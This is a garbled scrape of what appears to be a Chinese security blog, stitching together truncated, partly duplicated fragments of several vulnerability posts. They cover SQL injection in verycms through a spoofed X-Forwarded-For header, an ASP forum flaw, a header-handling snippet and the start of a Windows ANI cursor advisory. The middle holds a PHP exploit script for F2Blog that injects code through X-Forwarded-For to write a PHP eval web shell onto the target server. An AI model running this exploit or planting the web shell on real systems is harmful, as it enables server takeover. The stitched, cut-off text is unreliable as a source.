http://blog.sina.com.cn/cnbird[订阅]
博文
$proxy='*';
if(!(strlen($onlineip)>1 && strcasecmp($onlineip, 'unknown'))) {
verycms是phpwind团队开发的文章管理系统,现在已经出来3.0版,我突然想起来以前看到的2.0版的一个漏洞,记录一下。漏洞在php5环境下不受gpc设置影响。看代码
code:
passport_client.php
functionLoginipwrite($winduid){
global$db,$timestamp,$onlineip;
$logininfo='$onlineip|$timestamp|6';
$db->update(
'UPDATEpw_user SET lastvisit=thisvisit,thisvisit=''$timestamp'',onlineip=''$logininfo'' WHERE uid=''$winduid''');
}
再看$onlineip是怎么来的
Global.php
if($_SERVER[''HTTP_CLIENT_IP'']){
$onlineip=$_SERVER[''HTTP_CLIENT_IP''];
}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){
$onlineip=$_SERVER[''HTTP_X_FORWARDED_FOR''];
}else{
$onlineip=$_SERVER[''REMOTE_ADDR''];
}
$onlineip=substrs($onlineip,16);
十六个字节,够提升权限的了吧?
抓包提交
HTTP_X_FORWAR
code:
passport_client.php
function
global
$logininfo='$onlineip|$timestamp|6';
$db->update(
'UPDATE
}
再看$onlineip是怎么来的
Global.php
if($_SERVER[''HTTP_CLIENT_IP'']){
}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){
}else{
}
$onlineip
十六个字节,够提升权限的了吧?
抓包提交
HTTP_X_FORWAR
最近因为搬家不能上网,闲得无聊于是从网上下载各种各样的程序下来读,找找漏洞。尽管很多的程序漏洞依然大面积存在,但是也很开心的看到更多的程序也变得很安全,有的甚至真的找不出来明显的安全漏洞。看来程序员的防范思路都很不错,学到不少安全方面的东西。尽管一些简单而明显的漏洞已经很难发现了,但是还是有些地方需要注意的,一些漏洞在asp+access环境下尽管利用很苛刻,但是危害很大,这里我就以一些雪人论坛修改版本做例子说一下这些有点苛刻的漏洞危害与利用。
雪人论坛是国内的比较大的一个论坛,asp+access结构,早期的时候听说过存在过Sql注入漏洞。他的修改版本众多,我就找了个叫做颓废者论坛的修改版本,大家可以去中国站长站上看下其他的修改版本,我大致看了下,大部分都是存在这种漏洞的。颓废者论坛本来的作者也是对安全有一定了解的,所以本来是不抱什么希望找出什么大的漏洞,但是当我看到index.asp代码也就是用户进入论坛时第一个调用的文件的时候,我知道,漏洞出现了。看看index.asp里面的一些代码,我的是颓废者论坛(简约版),其他版本核心代码也是一样的哦:
print_r('
+------------------------------------------------------------------+
Exploit For F2Blog All Version
BY
Just For Fun :)
+------------------------------------------------------------------+
');
ini_set('max_execution_time',0);
error_reporting(7);
$blogpath='$argv[2]';
$server='$argv[1]';
$cookie='';
$shell= 'http://'.$server.$blogpath.'cache/loveshell.php';
$evilcode='fputs(fopen('cache/loveshell.php','w+'),'<?@eval(\$_REQUEST[c])?>Orz')';
$evilcode=''));'.$evilcode.';/*';
$evilip='X-Forwarded-For: '.$evilcode;
preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(''),$php);
echo 'We Got php version:\t'.$php[1].'\r\n';
send('');
$evilip='';
sen
程序在取得$_SERVER变量的时候,过滤不够严密,在初始化脚本common.inc.php中有如下一段代码:
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
}
$onlineip = preg_replace('/^([\d\.]+).*/', '\\1', $onlineip);
其中的HTTP_X_FORWARDED_FOR是客户端提交的,恶意用户可以用第三方软件如NC向服务器提交该变量。
用NC向服
8.3.
Systems Affected:
- Windows NT
- Windows 2000
- Windows XP
- Windows 2003
- Windows Vista
Overview:
Determina Security Research has discovered a vulnerability in the USER32.DLL code responsible for loading animated cursor (.ANI) files. This vulnerability can be exploited by a malicious web page or HTML email message and results in remote code execution with the privileges of the logged-in user. The vulnerable code is present in all versions of Windows up to and including Windows Vista. All applications that use the standard Windows API for loading cursors and icons are affected. This includes Windows Explorer, Internet Explorer, Mozilla Firefox, Outlook and others.
Microsoft fixed a closely related vulnerability with the MS05-002 security update, but their fix was incomplete. Determina Security Research was able to bypass
